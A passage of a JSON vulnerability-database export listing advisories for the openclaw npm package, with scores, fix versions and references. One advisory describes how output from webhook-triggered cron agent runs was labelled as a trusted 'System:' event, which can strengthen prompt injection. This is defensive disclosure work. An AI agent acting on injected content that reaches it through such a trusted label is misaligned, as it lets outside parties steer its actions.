g"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qhr2-jktm-uycx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-qr66-xgea-tufh"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkjm-wcmt-43br"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sh
4x-nq7t-ykgg"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-swjf-k83n-h7gf"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-w8sb-7ymy-wkez"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xf
gw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpnh-32hh-p7fb"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ycse-95bv-7ua9"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-z8sm-pm9t-wyhu"},{"vulnerability":"VCID-z9a2-t66z-buga"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.7"}],"aliases":["GHSA-rchv-x836-w7xp"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-2927-2whr-sudd"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89951?format=json","vulnerability_id":"VCID-294z-6z8j-97bx","summary":"OpenClaw: Gateway operator.write Can Reach Admin-Class Telegram Config and Cron Persistence via 
send\n## Summary\nGateway operator.write Can Reach Admin-Class Telegram Config and Cron Persistence via send\n\n## Current Maintainer Triage\n- Status: narrow\n- Normalized severity: medium\n- Assessment: Real shipped operator.write to admin-class Telegram config or cron persistence bug, but it is an authenticated sink-specific escalation and high is too high given the narrower scope.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.24`\n- Patched versions: `>= 2026.3.28`\n- First stable tag containing the fix: `v2026.3.28`\n\n## Fix Commit(s)\n- `b7d70ade3b9900dbe97bd73be9c02e924ff3c986` — 2026-03-25T12:12:09-06:00\n\n## Release Process Note\n- The fix is already present in released version `2026.3.28`.\n- This draft looks ready for final maintainer disposition or publication, not additional code-fix work.\n\nThanks @zpbrent for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41359","reference_id":"","reference_type":"","scores":[{"value":"0.0003","scoring_system":"epss","scoring_elements":"0.092","published_at":"2026-06-07T12:55:00Z"},{"value":"0.0003","scoring_system":"epss","scoring_elements":"0.09219","published_at":"2026-06-06T12:55:00Z"},{"value":"0.0003","scoring_system":"epss","scoring_elements":"0.09201","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41359"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/com
mit/b7d70ade3b9900dbe97bd73be9c02e924ff3c986","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-25T01:37:35Z/"}],"url":"https://github.com/openclaw/openclaw/commit/b7d70ade3b9900dbe97bd73be9c02e924ff3c986"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-767m-xrhc-fxm7","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-25T01:37:35Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-767m-xrhc-fxm7"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41359","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41359"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-operator-write-to-admin-class-telegram-config-and-cron-persistence","refere
nce_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-25T01:37:35Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-operator-write-to-admin-class-telegram-config-and-cron-persistence"},{"reference_url":"https://github.com/advisories/GHSA-767m-xrhc-fxm7","reference_id":"GHSA-767m-xrhc-fxm7","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-767m-xrhc-fxm7"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109863?format=json","purl":"pkg:npm/openclaw@2026.3.28","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerabili
ty":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerabili
ty":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerabili
ty":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"}],"aliases":["CVE-2026-41359","GHSA-767m-xrhc-fxm7"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-294z-6z8j-97bx"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89628?format=json","vulnerability_id":"VCID-29a1-7ar7-67e1","summary":"OpenClaw: Gateway HTTP endpoints re-resolve bearer auth after SecretRef rotation\n## Summary\n\nGateway HTTP and WebSocket handlers captured the resolved bearer-auth configuration when the server started. After a SecretRef rotation, the already-running gateway could continue accepting the old bearer token until restart.\n\n## Impact\n\nA bearer token that should have been revoked by SecretRef rotation could remain valid on the gateway HTTP and upgrade surfaces for the lifetime of the process. 
Severity remains high because the old token could continue to authorize gateway requests after operators believed it was rotated out.\n\n## Affected versions\n\n- Affected: `< 2026.4.15`\n- Patched: `2026.4.15`\n\n## Fix\n\nOpenClaw `2026.4.15` resolves active gateway auth from the runtime secret snapshot per request and per upgrade instead of using a stale startup-time value.\n\nVerified in `v2026.4.15`:\n\n- `src/gateway/server.impl.ts` exposes `getResolvedAuth()` backed by the current runtime secret snapshot.\n- `src/gateway/server-http.ts` calls `getResolvedAuth()` for each HTTP request and WebSocket upgrade before running auth checks.\n- `src/gateway/server-http.probe.test.ts` verifies `/ready` re-resolves bearer auth after rotation and rejects the old token.\n\nFix commit included in `v2026.4.15` and absent from `v2026.4.14`:\n\n- `acd4e0a32f12e1ad85f3130f63b42443ce90f094` via PR #66651\n\nThanks to @zsxsoft, Keen Security Lab, and @qclawer for reporting this issue.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-43585","reference_id":"","reference_type":"","scores":[{"value":"0.00131","scoring_system":"epss","scoring_elements":"0.32235","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00131","scoring_system":"epss","scoring_elements":"0.32265","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00143","scoring_system":"epss","scoring_elements":"0.34377","published_at":"2026-06-07T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-43585"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"9.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_ur
l":"https://github.com/openclaw/openclaw/commit/acd4e0a32f12e1ad85f3130f63b42443ce90f094","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"9.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-07T13:53:26Z/"}],"url":"https://github.com/openclaw/openclaw/commit/acd4e0a32f12e1ad85f3130f63b42443ce90f094"},{"reference_url":"https://github.com/openclaw/openclaw/pull/66651","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"9.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/pull/66651"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-xmxx-7p24-h892","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"9.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-07T13:53:26Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-xmxx-7p24-h892"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-43585","reference_id":"","reference_type":""
,"scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"9.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-43585"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-bearer-token-validation-bypass-via-stale-secretref-resolution","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"9.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-07T13:53:26Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-bearer-token-validation-bypass-via-stale-secretref-resolution"},{"reference_url":"https://github.com/advisories/GHSA-xmxx-7p24-h892","reference_id":"GHSA-xmxx-7p24-h892","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-xmxx-7p24-h892"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109881?format=json","purl":"pkg:npm/openclaw@2026.4.15","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb
"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.15"}],"aliases":["CVE-2026-43585","GHSA-xmxx-7p24-h892"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-29a1-7ar7-67e1"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89187?format=json","vulnerability_id":"VCID-2c8p-gbaw-3ye4","summary":"OpenClaw: Isolated cron awareness events were recorded as trusted system events\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `< 2026.4.20`\n- Patched version: `2026.4.20`\n\n## Impact\n\nOutput from webhook-triggered isolated cron agent runs could be queued into the main session awareness stream without `trusted: false`. That made the event render as a trusted `System:` event instead of an untrusted system event.\n\nThis is a trust-labeling issue that can strengthen prompt-injection impact, but it does not directly bypass gateway auth, tool policy, or sandboxing. 
